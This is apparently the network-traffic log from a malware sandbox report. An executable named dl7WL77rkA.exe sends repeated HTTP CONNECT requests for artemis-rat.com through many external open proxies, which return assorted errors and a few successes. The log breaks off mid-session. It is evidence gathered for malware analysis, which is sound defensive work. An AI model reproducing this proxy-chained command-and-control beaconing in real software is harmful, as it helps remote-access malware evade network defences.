                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1643192.168.2.55452218.169.83.8710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.465862036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.113110065 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1644192.168.2.554293202.40.181.220312473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.468950033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405175924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905529976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889580011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1645192.168.2.55306051.161.33.206293603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.469167948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.486990929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.599594116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.608639002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1646192.168.2.55425658.84.32.11856783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.470191956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1647192.168.2.554597172.64.86.217803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.470634937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.625262976 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1648192.168.2.554610172.67.182.102803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.473851919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.628844023 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1649192.168.2.554604216.169.73.65346793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.477005959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.014180899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514662027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.584357023 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1650192.168.2.55451789.168.121.17531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.478677988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.030585051 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1651192.168.2.55447777.91.74.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.481108904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.816641092 CET129INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Location: https://artemis-rat.com:443
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1652192.168.2.554629172.67.181.89803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.482943058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.637444019 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1653192.168.2.55411565.169.38.73265923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.488612890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1654192.168.2.554615164.92.86.113573913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.490530968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.014522076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702224016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.797343016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1655192.168.2.55294681.91.231.5780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.496519089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.130217075 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 716
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 12 Feb 2024 09:31:00 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 12 Feb 2024 09:31:00 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1656192.168.2.55471843.153.108.1264433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.500852108 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1657192.168.2.554667104.20.75.132803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.502748013 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.658256054 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1658192.168.2.55472043.153.108.1264433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.503278017 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1659192.168.2.55472243.153.108.1264433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.504158974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1660192.168.2.55472543.153.108.1264433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.505412102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1661192.168.2.55474243.157.50.2064433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.509008884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1662192.168.2.55474543.157.50.2064433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.510570049 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1663192.168.2.55475143.157.50.2064433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.512815952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1664192.168.2.55475343.157.50.2064433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.513420105 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1665192.168.2.554119192.111.130.5170023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.520996094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1666192.168.2.55459038.162.8.16731283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.521341085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.933722019 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1667192.168.2.553877178.54.21.20380813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.534751892 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1668192.168.2.55481491.231.186.1334433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.546200037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1669192.168.2.55481791.231.186.1334433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.547391891 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1670192.168.2.55481991.231.186.1334433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.549323082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1671192.168.2.55482291.231.186.1334433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.550968885 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1672192.168.2.550313103.155.166.14981813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.552455902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.595424891 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1673192.168.2.55450889.42.198.7941533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.629987001 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1674192.168.2.554665154.205.152.9631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.630059004 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
